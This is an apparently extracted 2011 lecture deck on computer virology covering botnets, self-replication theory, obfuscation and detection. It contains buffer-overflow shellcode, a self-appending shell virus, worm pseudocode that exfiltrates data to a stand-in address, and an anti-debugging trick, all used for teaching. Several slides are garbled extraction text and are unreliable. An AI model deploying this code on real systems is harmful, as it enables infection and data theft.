Post on 19-Aug-2018
An introduction to Computer Virology
Jean-Yves MarionLORIAUniversité de Nancy
Jean-Yves.Marion@loria.fr
1mardi 20 décembre 2011
What is a malware ?
• A malware is a program which has malicious intentions
• A malware is a virus, a worm, a spyware, a botnet ...
• Giving a mathematical definition is difficult
✴ So how it works ?
3mardi 20 décembre 2011
How do infections by malware work ?
Social engineering
Vulnerabilities
Infections
Infections
Mutations
You can’t patch stupidity
Bugs are un-avoidable
4mardi 20 décembre 2011
Social engineering
Page 3 of 66
INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,
AND FAST-FLUXING NETWORKS
SOCIAL ENGINEERING TECHNIQUES SEEN
WALEDAC recently used the Christmas 2008 holidays for its social engineering ploy when we first spotted it. It has changed its social engineering tactic of spamming on holidays and in relation to current economic events seven times. Appendix A chronicles the social engineering techniques we have seen this botnet use throughout its lifetime.
In addition to tricking users to run malware on their computers, WALEDAC also consistently populates inboxes with pharmaceutical (pharma) spam—spam that advertise Viagra, Cialis, and other similar sexual-enhancement drugs. However, there are times when WALEDAC spews out spam that are neither pharmaceutical in nature nor carry other malware. This suggests that it may have been hired by third parties or clients as a spamming service. These regular WALEDAC spam are also documented in detail in Appendix B.
The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far.
Figure 2. Timeline of WALEDAC activities
Page 34 of 66
INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,
AND FAST-FLUXING NETWORKS
APPENDIX A
WALEDAC Social Engineering Tactics
At the time this report was written, WALEDAC was seen to have used eight social engineering attacks in an effort to make would-be victims run the malware. WALEDAC started out with the Christmas Ecard ploy.
Figure 1. Christmas ecard spam
Figure 2. Christmas ecard website
Page 36 of 66
INFILTRATING WALEDAC BOTNET’S COVERT OPERATIONS: EFFECTIVE SOCIAL ENGINEERING, ENCRYPTED HTTP2P COMMUNICATIONS,
AND FAST-FLUXING NETWORKS
With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC started sending out spam for its new campaign. The email campaign then carried the bad news that “Obama refused to be the next president.”
Figure 5. WALEDAC email carrying the news that Obama refuses to be the next U.S. president
Figure 6. WALEDAC rips text off from Obama’s website,
bearing false news that he no longer wants to be the president
After taking advantage of Obama’s presidential campaign, WALEDAC then turned its sights to Valentine’s Day.
6mardi 20 décembre 2011
Waledac
• Use of a dropper
• Confickers or other malware are used to install waledac
• Binaries are packed with UPX and homemade packers
• Encryption technologies : RSA & AES (openSSL)
• Send emails from templates
• Scan files to find email addresses and password
• Download binaries and update itself
7mardi 20 décembre 2011
An email template
Received: from %^C0%^P%^R3-‐6^%:qwertyuiopasdfghjklzxcvbnm^%^%([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%])
by %^A^% with Microsoft SMTPSVC(%^Fsvcver^%); %^D^% From: "%^Fmynames^% %^Fsurnames^%" <%^Fnames^%@%^V1^%> User-‐Agent: Thunderbird %^Ftrunver^% To: %^0^% Subject: %^Fjuly^%
http://%^P%^R26^%:qwertyuiopasdfghjklzxcvbnmeuioa^%.%^Fjuly_link^%/^%
8mardi 20 décembre 2011
3-tier movie of an attack
social engineeringtargeted attack
client-side exploit
Install malware
a dropper
10mardi 20 décembre 2011
Software Bugs (client side exploit)
• Data are programs
• Bugs are doors if there are exploitable (0-days)
• A no bug system is safe
• But systems contain bugs ... and bug-free programs do not exist as a
consequence of the undecidability of the halting problem (Turing)
12mardi 20 décembre 2011
Vulnerabilities : a buffer-overflow
void vulnerable(char *user_data) { char buffer[4]; strcpy(buffer, userdata);}
buffer
EIP
EBP
...
...
...
Stack
vulenrable(«AAAAAAAAAAAAAAAA\xec\xf2\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls»)
\x90\x90
\xE000
\x90\x90
\x90\x90
\xFFF0
13mardi 20 décembre 2011
Vulnerabilities : a buffer-overflow
void vulnerable(char *user_data) { char buffer[4]; strcpy(buffer, userdata);}
buffer
EIP
EBP
...
...
...
Stack
\x90\x90
\xE000
\x90\x90
\x90\x90
\xFFF0
return at the address FFF0
14mardi 20 décembre 2011
Bugs
• A buffer-overflow transforms a program in a self-modifying program
Wave 2
Wave 1Wave 1
Wave 2 is the code created by buffer overflow in wave 1
15mardi 20 décembre 2011
What is a malware ?
• Infect systems by self-replication
• Mutation
• Protect itself
• Obfuscation
• Self-modification
• Detection
• Undecidable
Pourquoi tracer ? (1/3)
Definition : l’analyse binaire, c’est
• de l’analyse de programme
• ou le programme est inconnu
=⇒ on a juste un blob binaireRaisons :
• sauts indirects=⇒ flot de controle indecidable
• lectures/ecritures indirectes=⇒ flot de donnees indecidable
• code auto-modifiant=⇒ syntaxe indecidable
3 / 32
16mardi 20 décembre 2011
Outline
• Foundation 1 : Self-replication
• Foundation 2 : Self-modification
• Detection
• Detection by string matching
• Behavioral detection
• Botnet neutralization
17mardi 20 décembre 2011
Self-replicating Cellular automaton
Von Neumann (1952), Burke
Codd, Langton
19mardi 20 décembre 2011
Cohen’s formalization (1985)Recursion
theorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphism
Reproduction throughvectors
Detection
Conclusion
Cohen’s Virus (1985)
� Consider Turing Machine M� and a Viral set V� When a TM M reads v ∈ V , M produces v � ∈ V� (M, V ) is a description of a virus
v1 v2 ... vn v’1 v’2 v’m...
20mardi 20 décembre 2011
Self-Replication
• A virus has self-replicating capacity
• Reflexive property of programming language based on a
• Pointer mechanism to program code, e.g. $0
# for each f i l e FName in the current pathfor FName in ∗ ;do# i f FName i s not mei f [ $FName != $0 ] ; then# add myse l f a t the end o f FNamecat $0 >> $FNamef i
done
Figure 2: An example of ecto-symbiote
We see that by iterating this virus, it will make copies of itself until the
system runs out of memory.
The word “organism” comes from the terminology of Adleman in [1].
There, he proposed to study such viruses, which was not captured by his
formalization, as we shall see shortly. Organisms were a concern of Adleman.
Let us cite him [1], “It may be appropriate to study ‘computer organisms’ andtreat ‘computer viruses’ as a special case”. Our formalism allows a uniform
study of both concepts.
4.5 Companion viruses
A companion virus is an entity which does not modify the functional be-
havior of the target program at first glance. When one executes the target
program, the companion virus runs first, and then calls the target program.
An example of a companion virus is presented in Figure 3.
A companion virus satisfies an equation of the form
ϕv(p) = v�where ∀x ∈ D, ϕv�(x) = ϕp(ϕv(x))
Again, Theorem 3 gives solutions to this construction. Indeed, let q be a
program for the (composition) function comp(a, b, x) = ϕa(ϕb(x)). Solutions
of the above equation are the ones of the following equation.
ϕv(p) = S(q,p,v)
Indeed, ϕS(q,p,v)(x) = ϕp(ϕv(x)).
4.6 Implicit virus Theorem
We establish a virus construction which performs several actions depending
on some conditions on its arguments. This construction of trigger viruses is
9
21mardi 20 décembre 2011
Self-Replication
• Program encoding (Ken Thompson «Reflections on trusting Trust», CACM84)
• See also quines
main() { char *s="main() { char *s=%c%s %c; printf(s,34,s,34); }"; printf(s,34,s,34);}
22mardi 20 décembre 2011
Self-Replication
• Fixed point combinators (functional programming languages)
• Computability : Recursion theorem of Kleene (1938)
• See book of N.D Jones for a programming point of view
• See books of Rogers or P. Odifreddi for a computability point of view
• See marvelous books of R. Smullyan ...
Y F = Y (Y F )
23mardi 20 décembre 2011
A compilation point of view
•Open an email attachment by social engineering
•X scans for informations
•X extracts a list of email address of targeted peoples
•X sends copy of itself by email
A worm X scenario
24mardi 20 décembre 2011
WormX(v,out){ info := extract(out); send(«badguy»,info); @bk := findAddress(out); send(@bk,v); }
Worm X specification
How to compile Worm X ?
send informationfind email address
send worm X to @bk
extract information
25mardi 20 décembre 2011
Program Semantics Recursion
theorems as a
foundation of
computer virology
Viruses and
worms
ILoveYou
State of the art
A more abstract
approach
Abst Virology
Weak recursion
Blueprint Distributions
Strong recursion
External polymorphism
Extended
recursion
fixed polymorphism
Explicit recursion
Internal polymorphism
Reproduction through
vectors
Detection
Conclusion
Semantics
�_� : Programs×D∗ → D∗
where a value of D∗ is a system environment.
From the above example
�send�(spider@man.com,�� Hello��, Out)
= cons(cons(spider@man.com,�� Hello��), Out)
Where Out is an output stream.
is the value of P on the environment d�P �(d)
26mardi 20 décembre 2011
Solve a fixed point equation
Recursiontheorems as afoundation of
computer virology
I Always Love You
Suppose that out is a system entry point,A specification of ILoveYou is:
love(v,out) {info := find(out); // find informationsout := send(cons(‘‘badguy@dom.com’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}
v should behave as ILoveYou if:
!W "(out) = !WormX"(W,out)
We have to solve a fixed point equation :
W is a worm satisfying the specification WormX
27mardi 20 décembre 2011
If p is a program, then there is a program e such that:
Kleene’s recursion theorem
Recursiontheorems as afoundation of
computer virology
Kleene’s recursion theorem
A general solution to fixed point equations is given byTheorem (Kleene (1938))If p is a program, then there is a program e such that
!e"(x) = !p"(e, x)
A solution of IloveYou equation
!v"(out) = !love"(v,out)
Set v = e where p = Love.
Proof:
�q�(y, x) = �p�(�d�(y), x)
�d(q)�(x) = �q�(q, x) �d�(q) = �p�(�d�(q), x)
e = d(q)
�d(x)�(y) = �x�(x, y)
28mardi 20 décembre 2011
Malware construction from a specification
Recursiontheorems as afoundation of
computer virology
I Always Love You
Suppose that out is a system entry point,A specification of ILoveYou is:
love(v,out) {info := find(out); // find informationsout := send(cons(‘‘badguy@dom.com’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}
v should behave as ILoveYou if:
!W "(out) = !WormX"(W,out)Kleene fixed point is a solution of
Kleene recursion theorem:If p is a program, then there is a program e such that:
Recursiontheorems as afoundation of
computer virology
Kleene’s recursion theorem
A general solution to fixed point equations is given byTheorem (Kleene (1938))If p is a program, then there is a program e such that
!e"(x) = !p"(e, x)
A solution of IloveYou equation
!v"(out) = !love"(v,out)
Set v = e where p = Love.We can construct a virus, which satisfies a given specification.
29mardi 20 décembre 2011
Self-replicating malware compiler
There is a compiler Comp such that W is the worm satisfying the specification Worm:
Recursiontheorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphismReproduction throughvectors
Detection
Conclusion
I Always Love YouSuppose that out is a system entry point,A specification of ILoveYou is:love(v,out) {info := find(out); // find informationsout := send(cons(‘‘badguy@dom.com’’,nil),info);@bk := extract(out); //extract addressesout := send(@bk,v); //send virus to @bkreturn out;}
v should behave as ILoveYou if:
!W "(out) = !WormX"(W,out)
!Comp"(Worm) =W!W"(out) = !Worm"(W,out)
30mardi 20 décembre 2011
Self-replication with mutations
We can generate malware which satisfies the specification Worm, and mutates at each execution automatically
where Mutate is a code mutation procedure
Recursiontheorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphismReproduction throughvectors
Detection
Conclusion
Some historical facts
!e"(out) = !Worm"(Mutate(e),out)
! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses
The construction of e is given by Kleene’s theorem.
31mardi 20 décembre 2011
Self-replicating compiler with mutations:
There is a compiler Comp such that for all worm specification Worm and mutation procedure Mutate :
Recursiontheorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphismReproduction throughvectors
Detection
Conclusion
Some historical facts
!e"(out) = !Worm"(Mutate(e),out)
!Comp"(Worm) =W!W"(out) = !Worm"(Mutate(W),out)
! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses
32mardi 20 décembre 2011
References
• PhD thesis of F. Cohen
• L. Adleman (1988) which coins the word «virus»
• Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): 45-54 (2006)
A Virus is a Virus, Lwoff
33mardi 20 décembre 2011
A data is a code
Today’s computers are built from two key principles:
1) Instructions are represented as numbers
2) Programs can be stored in memory to be read or written just as numbers
(Patterson & Hennessy)
35mardi 20 décembre 2011
Applications of self-modifying programs
• Malware mutations
• Code protection (digital rights)
• Compression and packers
• Just in Time compilers
36mardi 20 décembre 2011
A simple self-modifications
n + 1n
A simple decryption loop
Wave 2
Wave 1
jnz @b
{@a,@b,@c,@d}
{@offset}
37mardi 20 décembre 2011
Another example of self-modification
Proxy = { X:= Read();
eval(X);} An external input is run
An interpreter of a known or unknown language is used to execute some data
39mardi 20 décembre 2011
Analyzing self-modifying programs
• Complex to design and to analyze
• Program flow may change
• Usual in semantics program and data are separatedRecursion
theorems as afoundation of
computer virology
Viruses andworms
ILoveYou
State of the art
A more abstractapproach
Abst Virology
Weak recursionBlueprint Distributions
Strong recursionExternal polymorphism
Extendedrecursionfixed polymorphism
Explicit recursionInternal polymorphismReproduction throughvectors
Detection
Conclusion
Some historical facts
P ! ! " !!
!e"(out) = !Worm"(Mutate(e),out)
!Comp"(Worm) =W!W"(out) = !Worm"(Mutate(W),out)
! 1983 : the first official virus pn Vax-PDP 11! 1988 : The first worm which infects 6000 machines! 1990 :Dark Avenger mutation engine (Bulgaria)! 1995 : macro virus! 2000 : Worm “I Love You”! 2001 : Palm pilot virus! 2004: Cell phone viruses
Define by structural induction on P :
40mardi 20 décembre 2011
Dynamic analysis of self-modifying programs
• Instrument a program
• Monitor read R, write W memory access and memory execution X
• We follow nested self-modifying
• We detect some code protection
• We detect code patterns
• code decryption
• Integrity checking
• ....
41mardi 20 décembre 2011
Experiments with TraceSuferResultats experimentaux 1/3
• Nombre de vagues de code detectees sur l’ensemble des binaires◦ max : 56 vagues
24 / 32
Number of waves detected - max=56
95 613 Binaries, 80% of success, 1400 binaries/h
TraceSurfer based on Pin (Intel)
44mardi 20 décembre 2011
Related works
• TraceSufer based on PIN (INTEL)
• Bitblaze (Berkeley) : TEMU, VINE, ...
• DynamoRio, Ether, Metasm
• Data tainting related methods
45mardi 20 décembre 2011
Malware detection by string scanning
• Signature is a regular expression denoting a sequence of bytes
Worm.YYour mac is now under our control !
• Signature : «Your * is now under our control
Worm.YYour PC is now under our control !
47mardi 20 décembre 2011
Malware detection by string scanning
• Signature is a regular expression denoting a sequence of bytes
• Data base of known signatures
Source : Filiol
Toute reproduction sans autorisation du Centre français d’exploitation du droit de copieest strictement interdite. – © Editions T.I. H 5 440v2 – 9
______________________________________________________________________________________________________________ VIRUS INFORMATIQUES
– en mode dynamique : l’antivirus est en fait résident et surveilleen permanence l’activité du système d’exploitation, du réseau etsurtout de l’utilisateur. Il prend la main avant toute action et tentede déterminer si un risque viral existe, lié à cette action. Ce modeest gourmand en ressources et nécessite des machines relative-ment puissantes pour ne pas être handicapant et pousser l’utilisa-teur (cas trop souvent rencontré) à désactiver ce mode au profit duprécédent.
Les antivirus modernes, pour les plus efficaces, sont supposésconjuguer plusieurs techniques (programmées dans des modulesdénommés moteurs) afin de réduire le risque au minimum. Ellespeuvent être classées en deux groupes :
• l’analyse de forme, communément appelée recherche designatures. Cette dernière appellation est en réalité improprecar elle ne considère qu’une approche très restreinte de l’ana-lyse de forme, laquelle regroupe de nombreuses techniques.L’analyse de forme consiste à analyser un code vu commeune séquence de bits ou d’octets, hors de tout contexted’exécution. Cette analyse est fondée sur la notion deschéma de détection ([9] chapitre 2) , composéd’un motif de détection (relativement à un code mal-veillant ) et d’une fonction de détection . Il s’agit alors derechercher de différentes manières (caractérisées par la fonc-tion de détection), relativement à une ou plusieurs bases(ensemble de schémas de détection), des chaînes de bits oud’octets , à la structure plus ou moins complexe, réperto-riées dans ces bases comme caractéristiques d’un code mal-veillant donné ;
• l’analyse comportementale dans laquelle un fichierexécutable est analysé dans son contexte d’exécution. Ils’agit d’une détection fonctionnelle – ce sont les« comportements » ou les actions du code qui sont étudiées.Dans ce contexte, la détection se fonde alors sur la notion destratégie de détection [9].
Comme le montre cette définition, la notion de stratégie dedétection est en fait plus large que celle de schéma de détection.
2.2.1 Techniques ant ivirales par analyse de formeEssentiellement quatre techniques principales peuvent être
citées.
2.2.1.1 Recherche de signatures ou scanningDans le cas le plus trivial (et le plus fréquent), cela consiste à
rechercher une suite de bits, caractéristiques d’un virus donné,analogue pour la police, à l’empreinte digitale. Dans le cas général,la notion de schéma de détection s’applique. Malheureusement,l’étude des principaux produits antiviraux actuels ([9] chapitre 2)montre que les motifs de détection et les fonctions de détectionutilisés sont les plus triviaux – et donc les plus faibles – que l’onpuisse imaginer. La raison tient au fait que tout autre choixtechnique risque de se traduire par une consommation intolérabledes ressources de l’utilisateur, et donc de ne pas êtrecommercialement viable.
Le motif de détection ne doit théoriquement pas incriminer unautre virus tout en possédant une taille et des caractéristiquessuffisamment pertinentes pour ne pas provoquer de faussesalarmes (la probabilité de trouver une séquence donnée de n bitsest inversement proportionnelle à 2n) ([9] chapitre 2). Cette signa-ture peut être une séquence d’instructions plus ou moinscomplexe, établie par l’analyste du code selon différents critères,un message affiché par le virus ou bien tout simplement la signa-ture que le virus lui-même utilise pour éviter la surinfection d’unexécutable. Le problème avec la recherche par signature estqu’elle est facilement contournable (une simple modification d’unoctet suffit). Elle ne permet pas de gérer efficacement les viruspolymorphes ou les virus chiffrés (à moins de considérer des fonc-tions de détection moins triviales que la fonction ET, et encoremoins les virus inconnus. Le taux de fausses alarmes est théo-riquement faible si la signature n’est pas trop limitée en taille.
Le principal problème de ce mode de détection est la nécessitéde maintenir la base de signatures virales avec les contraintes quecela comporte : taille de la base, stockage sécurisé (des sitesd’antivirus contenant les bases de signatures de leurs produitssont quelquefois attaqués), distribution sécurisée, mise à jour plusou moins régulière et effective par l’utilisateur, souvent négligeant.Actuellement, la fréquence de mise à jour d’un antivirus est de plu-sieurs fois par semaine à plusieurs fois par jour. À noter que lamise à jour de ces bases permet la détection de nouveaux virus ouvers, mais aussi dans certains cas, d’améliorer la détection des
Définition 5 : stratégie de détectionUne stratégie de détection relativement à un code malveillant
donné est le triplet :
avec ensemble d’octets,ensemble de fonctions de programme,
fonction booléenne dite dedétection.
!" !# #= { , }f!#
# f#
!#
#
#
"! ! $# # #= { , , }f
!#
$#
f# :! ! !2 2! $# #! " 2
Tableau 1 – M otif viral de I-Worm.Bagle.P
ProduitTaille
signature(en octets)
Signature(indices)
Avast 8 12,916 " 12,91912,937 " 12,940
AVG 14,575 533 " 536 - 538 - ...Bit Defender 8,330 0 - 1 - 60 - 128 - 129 - 134 - ...
Dr Web 6,169 0 - 1 - 60 - 128 - 129 - 134 - ...eTrust/Vet 1,284 0 - 1 - 60 - 128 - 129 - 134 - ...
eTrust/Inoculate IT 1,284 0 - 1 - 60 - 128 - 129 - 134 - ...
F-Secure 2005 59 0 - 1 - 60 - 128 - 129 - 546 - ...
G-Data 54 0 - 1 - 60 - 128 - 129 - 546 - ...KAV Pro 59 Identique à celle de F-Secure 2005McAfee
2006 12,127 8 0 - 1 - 60 - 128 - 129 - 134 - ...
NOD 32 21,849 0 - 1 - 60 - 128 - 129 - 132 - 133 - ...Norton 2005 6 0 - 1 - 60 - 128 - 129 - 134
Panda Tit. 2006 7,579 0 - 1 - 60 - 134 - 148 - 182 - 209...
Sophos 8,436 0 - 1 - 60 - 128 - 129 - 134 - 148...Trend
Office Scan 88 0 - 1 - 60 - 128 - 129 - ...
Exemple : considérons la détection d’un ver récent et connucomme le ver Bagle.P. La liste des différents motifs de détection estdonnée dans le tableau 1 . La fonction de détection est la fonctionlogique ET. Cela signifie que pour que le ver soit détecté, les octetsplacés aux indices donnés dans le tableau aient une valeur parti-culière. Si un seul de ces octets est modifié, le ver n’est plus détecté.
Worm.Bagle.P:
48mardi 20 décembre 2011
Malware detection by string scanning
• Signature are quasi-manually constructed
• Vulnerable to malware protections
➡ Mutations
➡ Code obfuscations
Pros :
Cons :
• Accuracy: low rate of false positive
➡ programs which are not malware are not detected
• Efficient : Fast string matching algorithm
➡ Karp & Rabin, Knuth, Morris & Pratt, Boyer & Moore
49mardi 20 décembre 2011
Detection by integrity check
• Identify a file using a hash function
• Cons :• File systems are updated, so numerical fingerprints change• Difficult to main in practice• Files may change with the same numerical fingerprint (due to hash fct)
Hash functionFiles Hash numbers
a
b
numerical fingerprints
50mardi 20 décembre 2011
Behavioral analysis
• Monitor program interactions (sys calls, network calls, ...)
• Detection of program behavior from execution traces
• Functionalities are expressed at high level
Trace automata
Introduction
Trace abstraction• Behavior patterns• Abstracting byreduction• Trace automata• Regular abstraction
Malicious behaviordetection
Experiments
Conclusion
12 / 22
• Trace language of a program: generally undecidable.
• Approximation by a regular language: using trace collectionor static analysis.
=! A trace automaton is a finite state approximation of some tracelanguage.
GetLogicalDriveStrings
IcmpSendEcho GetDriveType FindNextFileFindFirstFile
GetDriveType FindFirstFile
FindFirstFile FindNextFile
FindNextFile
• Information leak can be detected• Cons :
• Today behavioral analysis is dynamic, which implies to monitor all processes, or run programs in sandboxes.
• It slows down the system
51mardi 20 décembre 2011
Code protection
1.Obfuscation
2.Cryptography
3.Self-modification
4.Anti-analysis tricks
Detection is hard because malware are protected
52mardi 20 décembre 2011
Protections: Self-Modification and Obfuscation
• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.
• The obfuscation mechanism is automatically modified for each new distributed binary.
!"#$%&'(#)($*+,
- .&( &/ 01.213# /104.4#5 65# "&0#7018#91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 15(1'8138 0&8#.?
!"# 6'91:;4'> :&8# 45 16(&01(4:1..@ 0&84/4#8 /&3#1:" '#2 845(34<6(#8 <4'13@A
B
C34>4'1.<4'13@
D'91:;4'>$:&8#
EF
CEF
!349&6)?$G#H#35#7#'>4'##34'>$&/$01.213#$91:;#35$/&3$86004#5$7 I##9J#: BK+K$
• For a human analyst, it is very hard to understand an obfuscated code
53mardi 20 décembre 2011
Win32.Swizzor Packer!"#$%&'()*(+'#,-.(/0(1-0#"'2.3#-
445"36#,7*(8&9&":&;&-<3-&&"3-<(#0('2%=2"&(62>?&":(0#"(@,''3&:(; A&&6B&> )C4C(
54mardi 20 décembre 2011
Protections: Self-Modification and Obfuscation
• A lot of malware families use home-made obfuscations, like packers to protect their binaries, following a standard model.
• The obfuscation mechanism is automatically modified for each new distributed binary.
!"#$%&'(#)($*+,
- .&( &/ 01.213# /104.4#5 65# "&0#7018#91:;#35 (& 93&(#:( ("#43 <4'134#5= /&..&24'> 15(1'8138 0&8#.?
!"# 6'91:;4'> :&8# 45 16(&01(4:1..@ 0&84/4#8 /&3#1:" '#2 845(34<6(#8 <4'13@A
B
C34>4'1.<4'13@
D'91:;4'>$:&8#
EF
CEF
!349&6)?$G#H#35#7#'>4'##34'>$&/$01.213#$91:;#35$/&3$86004#5$7 I##9J#: BK+K$
• For a human analyst, it is very hard to understand an obfuscated code because not all the code lines are meaningful and because x86 semantics is very tricky.
• One problem is the absence of high level abstraction to structure and understand obfuscated codes.
55mardi 20 décembre 2011
Code protection
1.Obfuscation
2.Cryptography
3.Self-modification
4.Anti-analysis tricks
Detection is hard because malware are protected.
Some interesting protection methods:
56mardi 20 décembre 2011
Obfuscation
• Function calls
✦ A function has a purpose
✦ Divide and conquer approach by understanding function purposes
!"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5(63789:&;&%(+$,<"2.<3#-,
=>?"3@#AB*(C&;&",&9&-73-&&"3-7(#0('2%D2"&(@2.E&",(0#"(FA''3&,(9 G&&@H&. >I=I(
J& %3E& <# 2-F .#'@%3.2<&F@"#$%&',KL- 2 ,<2-F2"F $3-2"4*
?83,(3,(2(0A-.<3#-M(J&(.2-(<8A,(.#-,3F&"(<8&(.#F&(
KKK• Higher degree of abstraction
• There are a lot, a lot of other obfuscation methods ...
57mardi 20 décembre 2011
Obfuscation
• but in malware’s world, what is the purpose of a function call ?
!"#$%&'()*(+$,&-.&(/0(1&2,3%4(,&&-5(63789:&;&%(+$,<"2.<3#-,
=)>"3?#@A*(B&;&",&9&-73-&&"3-7(#0('2%C2"&(?2.D&",(0#"(E@''3&,(9 F&&?G&. HI=I(
J@< 3- #@" C#"%EK C& .2- 82;&*
58mardi 20 décembre 2011
Code protection
1.Obfuscation
2.Cryptography
3.Self-modification
4.Anti-analysis tricks
59mardi 20 décembre 2011
http://quequero.org/AgoBot_Botnet_Reverse_Engineering
62mardi 20 décembre 2011
Code protection
1.Obfuscation
2.Cryptography
3.Self-modification
4.Anti-analysis tricks
63mardi 20 décembre 2011
Code protection
1.Obfuscation
2.Cryptography
3.Self-modification
4.Anti-analysis tricks
65mardi 20 décembre 2011
Anti-debuging tricks
MOV EAX,-1
INT 2E
CMP WORD PTR DS:[EDX-2],2ECD
• Call interruption 2E with an invalid EAX value
• Normal behavior : EDX contains the address of the next instruction
• Test if EDX-2 points to the opcode of INT 2E, which is 2ECD
• If a debugger is running, then EDX is equal to 0xFFFFFFFF
66mardi 20 décembre 2011
Consequences of Code protection
1. Difficult for a human analyst to understand a malware code
1. Ollydbg
2.IDA Pro
67mardi 20 décembre 2011
Consequences of Code protection
1. Difficult for a human analyst to understand a malware code
1. Ollydbg
2.IDA Pro
2.Difficult to design automatic tools
1.Static analysis
• Abstract interpretation
2.Dynamic analysis
69mardi 20 décembre 2011
A cruel world
Theorem : Let v be a virus. The set of viruses which are obtained from v by mutation is not decidable (computable).
A consequence of Rice theorem
Theorem (RICE): Let P be a non-trivial computable property.
Then the set of programs which satisfies P is not decidable.
Idea of the proof : Construct a reduction from the halting problem.
71mardi 20 décembre 2011
Morphological analysis in a nutshell
Signatures are abstract flow graph
Detection of subgraph in program flow graph abstraction
72mardi 20 décembre 2011
Morphological detection : Results
• False negative
• No experiment on unknown malware
• Signatures with < 18 nodes are potential false negative
• Restricted signatures of 20 nodes are efficient
• Less than 3 sec. for signatures of 500 nodes
75mardi 20 décembre 2011
Conclusion about morphological detection
• Benchmarks are good
• Pro
• More robust on local mutation and obfuscation
• Detect easily variants of the same malware family
• Try to take into account program semantics
• Quasi-automatic generation of signatures
• Cons
• Difficult to determine flow graph statically of self-modifying programs
• Use of combination of static and dynamic analysis
76mardi 20 décembre 2011
Reference
• Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer 2008.
77mardi 20 décembre 2011
Waledac, again ....
• How to neutralize a botnet ?
• Send the US-Marshals (see Rustock recent story)
• Design an attack
• Good understanding of the mechanisms of a botnet (reverse engineering)
• Find an attack
• Large scale experiments in vitro
78mardi 20 décembre 2011
Waledac Peer-to-peer communication protocol
• Each peer maintains a list of known peer (RLIST)
• Bots exchange parts of their RLIST on regular basis to maintain connectivity
• Fallback mechanism over HTT¨to fetch new peers
<lm><localtime>1244053204</localtime><nodes><node ip="a.b.c.d" port="80“ time="124053217">469abea004710c1ac0022489cef03183</node><node ip="e.f.g.h" port="80" time="124053232“> 691775154c03424d9f12c17fdf4b640b</node>...</nodes></lm>
Global timestamp
Id Repeater 1
local timestamp
Sorted by local time
79mardi 20 décembre 2011
Waledac Peer-to-peer communication protocol
• Update are based on the most recent timestamps
• IP address does not identify a peer
• The id identifies a peer
• Vulnerability to sibyl attack
• Craft a RLIST update to put «myIP» on the top-500 list
